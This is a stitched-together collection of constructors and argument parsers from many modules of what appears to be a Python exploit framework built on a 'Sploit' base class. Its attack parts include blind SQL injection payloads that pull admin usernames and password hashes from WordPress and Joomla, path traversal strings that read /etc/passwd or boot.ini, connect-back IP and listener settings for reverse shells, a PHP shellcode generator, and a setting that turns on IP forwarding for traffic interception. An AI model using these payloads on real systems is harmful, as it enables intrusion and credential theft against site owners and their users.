def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.host = host self.port = port self.callback_ip = '' self.version = ''
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.port = port self.host = host self.ssl = False self.basepath = "/"
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO["NAME"] self.host = host self.port = port self.new_pass = OPTIONS["NEW_PASSWORD"] self.basepath = OPTIONS["BASEPATH"]
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.new_pass = OPTIONS['NEW_PASSWORD'] self.basepath = OPTIONS["BASEPATH"]
def __init__(self, host='', port=0, output_to_file=False, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.host = host self.port = port self.output_to_file = output_to_file
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.callback_ip = '' self.version = ''
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.listener_port = None return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.port = port self.host = host self.dns1 = '' self.dns2 = ''
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.host = host self.port = 4000 self.state = "running" return
def __init__(self, host='192.168.1.110', port=80, logger=None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.host = host self.port = port self.state = "running" return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.basepath = '/' self.path = OPTIONS['PATH']
def __init__(self, port=8089, logger=None): Sploit.__init__(self,logger=logger) self.port = port self.state = "running" return
def __init__(self,command="calc.exe", logger=None): Sploit.__init__(self,logger=logger) self.command_exec = command self.name = INFO['NAME'] self.state = "running" return
def __init__(self, year=2037, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.year = year self.SYSTEM_EPOCH = datetime.date(*time.gmtime(0)[0:3]) self.NTP_EPOCH = datetime.date(1900, 1, 1) self.NTP_DELTA = (self.SYSTEM_EPOCH - self.NTP_EPOCH).days * 24 * 3600
def __init__(self,host="", port=0, ssl=False, logger=None): Sploit.__init__(self,logger=logger) self.php_shellcode_gen = PhpShellcodes() self.vuln_path = 'alerts/alertConfigField.php?urlConfig=' self.listener_port = None
def __init__(self, host="", port=0, ssl=False, logger=None): Sploit.__init__(self, logger=logger) self.host = OPTIONS["HOST"] self.port = OPTIONS["PORT"] self.vhost = OPTIONS["VHOST"] self.command = OPTIONS["COMMAND"] self.url = ""
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.basepath = OPTIONS["BASEPATH"] self.callback_ip = ''
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.port = port self.host = host self.threads = 10 self.atime = 120
def __init__(self, ipv4="", ipv6="", logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.ipv4 = ipv4 self.ipv6 = ipv6 self.reg_a = 1 self.reg_aaaa = 28
def __init__(self, host="", port=0, ssl=False, logger=None): Sploit.__init__(self, logger=logger) self.port = OPTIONS["PORT"] self.host = OPTIONS["HOST"] self.name = INFO['NAME'] self.state = "running" return
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.host = host self.port = port self.path = OPTIONS['PATH'] self.basepath = OPTIONS["BASEPATH"]
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = 4000 self.state = "running" return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.port = port self.host = host self.command = "" self.username = '' self.password = ''
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.cmd = OPTIONS['CMD'] self.host = host self.port = port self.state = "running" return
def __init__(self, host1="", host2="", interface="", timer=1, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host1 = host1 self.host2 = host2 self.interface = interface self.timer = timer self.path = '/proc/sys/net/ipv4/ip_forward'
def __init__(self,host="", port=0, logger=None): Sploit.__init__(self,logger=logger) self.port = port self.host = host self.name = INFO['NAME'] return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO["NAME"] self.port = port self.host = host self.filename = None self.state = "running" return
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.ssl = False self.port = port self.host = host self.basepath = '/inoerp' self.pool = string.ascii_letters + string.digits + ':$/\\+'
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self,logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.path = OPTIONS["PATH"] self.filename = OPTIONS['FILENAME'] self.ssl = False
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.port = port self.host = host self.username = '' self.password = '' self.basepath = '' self.email = ''
def __init__(self, host="", from_port=0, to_port=1000, nthreads=200, logger=None): Sploit.__init__(self, logger=logger) self.host = host self.from_port = from_port self.to_port = to_port self.nthreads = nthreads self.name = INFO["NAME"] self.scanner = None return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.path = OPTIONS['PATH'] self.username = OPTIONS["USERNAME"] self.password = OPTIONS["PASSWORD"] self.basepath = OPTIONS["BASEPATH"]
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.host = host self.port = port self.username = OPTIONS["USERNAME"] self.password = OPTIONS["PASSWORD"] self.basepath = OPTIONS["BASEPATH"] self.callback_ip = ''
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.ssl = False self.port = port self.host = host self.ttl = 5 self.basepath = '/wordpress' self.pool = string.ascii_letters + string.digits + ':$/\\+'
def __init__(self,host="", port=0, ssl=False, logger=None): Sploit.__init__(self,logger=logger) self.host = OPTIONS["HOST"] self.port = OPTIONS["PORT"] self.vhost = OPTIONS["VHOST"] self.command = OPTIONS["COMMAND"] self.url = ""
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.host = host self.port = port self.ssl = False self.version = '' self.state = "running" return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.ssl = False self.ttl = 5 self.port = port self.host = host self.basepath = '/joomla3' self.pool = string.ascii_letters + string.digits + '._:$/\\+' self.table = ''
def __init__(self,host="", port=0, ssl=False, logger=None): Sploit.__init__(self,logger=logger) self.host = "" self.port = 0 self.connectback_ip = "" self.connectback_port = 0 self.ssl = False self.url = ""
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.ssl = False self.port = port self.host = host self.basepath = '/' self.url = '' self.table = '' self.state = "running" return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO["NAME"] self.ssl = False self.port = port self.host = host self.basepath = "/" self.url = "" self.table = "" self.state = "running" return
def __init__(self, url="example.xom", ip="127.0.0.1", portr="4000", logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.url = url #self.command = command self.ip = ip self.portr = portr
def __init__(self,host="", port=0, fileDownload="", ssl=True, logger=None): Sploit.__init__(self,logger=logger) self.port = port self.host = host self.filed = fileDownload self.ssl = ssl self.url = "" self.name = INFO['NAME'] self.state = "running" return
def __init__(self, host="", port=0, logger=None): Sploit.__init__(self, logger=logger) self.name = INFO['NAME'] self.port = port self.host = host self.ssl = False self.ttl = 5 self.basepath = "/" self.username = '' self.password = '' self.pool = string.ascii_letters + string.digits + ':$/\\+.' self.cookie = ''
def __init__(self, host="127.0.0.1", port=80, depth=120, file_name="/etc/passwd", url="/", logger=None): Sploit.__init__(self,logger=logger) self.system = "Windows" self.host = host self.port = port self.depth = 120 self.gets = [] self.file_name = file_name self.url = url self.name=INFO['NAME'] return
def __init__(self, host="", from_port=0, to_port=1000, nthreads=200, logger=None): Sploit.__init__(self, logger=logger) self.host = host self.from_port = from_port self.to_port = to_port self.nthreads = nthreads self.name = INFO['NAME'] self.scanner = None return
def __init__(self, host = "", port = 0, logger = None): Sploit.__init__(self, logger = logger) self.name = INFO['NAME'] self.ssl = False self.port = port self.host = host self.ttl = 5 self.username = OPTIONS["USERNAME"] self.password = OPTIONS["PASSWORD"] self.basepath = '/exponent' self.pool = string.ascii_letters + string.digits + ':' self.cookiesjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar)) urllib2.install_opener(opener)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.path = self.args.get('PATH', OPTIONS['PATH']) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.basepath = self.args.get('BASEPATH', self.basepath)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.filename = self.args.get('FILENAME', 'boot.ini') self.url = self.make_url('/%2e%2e/' * 16 + self.filename) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.basepath = self.args.get('BASEPATH', self.basepath) self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", OPTIONS["HOST"]) self.port = self.args.get("PORT", OPTIONS["PORT"]) self.vhost = self.args.get("VHOST", OPTIONS["VHOST"]) self.vhost = self.vhost if not self.vhost.endswith("/") else self.vhost[0:-1] self.path_to_file = self.args.get("PATH TO FILE", OPTIONS["PATH TO FILE"]) self.url = "http://{}:{}/{}/{}{}".format(self.host, self.port, self.vhost, self.vuln_path, self.path_to_file) pass
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) target = self.args.get('TARGET', "Wnd XP Sp2") if '3' in target: self.addr = 0x27155CA return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.from_port = self.args.get("FROM_PORT", self.from_port) self.to_port = self.args.get("TO_PORT", self.to_port) self.nthreads = self.args.get("THREADS", self.nthreads) self.type = self.args.get("SEARCH", "opened") self.scanner = Scanner(self.from_port, self.to_port, self.host) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = self.args.get("PORT", self.port) self.depth = self.args.get("DEPTH", self.depth) self.url = self.args.get("URL", self.url) self.system = self.args.get("System", self.system) self.file_name = "/etc/passwd" if "GNU" in self.system else "boot.ini" return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host).replace("/", "").replace("\\","") self.port = self.args.get("PORT", self.host) self.vhost = self.args.get("VHOST", self.vhost) self.vhost = self.vhost if self.vhost.startswith("/") else ("/" + self.vhost) self.command = self.args.get("COMMAND", self.command) self.url = "http://%s:%s%s" % (self.host, self.port, self.vhost) if not self.url.endswith("/"): self.url += "/"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.ttl = int(self.args.get('TTL', self.ttl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url('/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1') self.data = "%20and%20SUBSTR((SELECT%20CONCAT(user_login,CHAR(58),user_pass)%20FROM%20wp_users%20where%20id=1),{pos},1)=CHAR({char})%20and%20sleep(5)"
def args(self): self.args = Sploit.args(self, OPTIONS) ssl = self.args.get("SSL", OPTIONS["SSL"]) protocol = "https://" if ssl else "http://" self.host = self.args.get("HOST", OPTIONS["HOST"]).replace("/", "").replace("\\","") self.port = self.args.get("PORT", OPTIONS["PORT"]) self.connectback_ip = self.args.get("CONNECTBACK_IP", OPTIONS["CONNECTBACK_IP"]) if self.args['listener']: self.connectback_port = self.args['listener']['PORT'] self.url = "{proto}{host}:{port}/".format(proto=protocol, host=self.host, port=self.port)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.ssl = bool(self.args.get("SSL", self.ssl)) self.basepath = self.args.get("BASEPATH", self.basepath) self.url = self.make_url( "/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29" ) return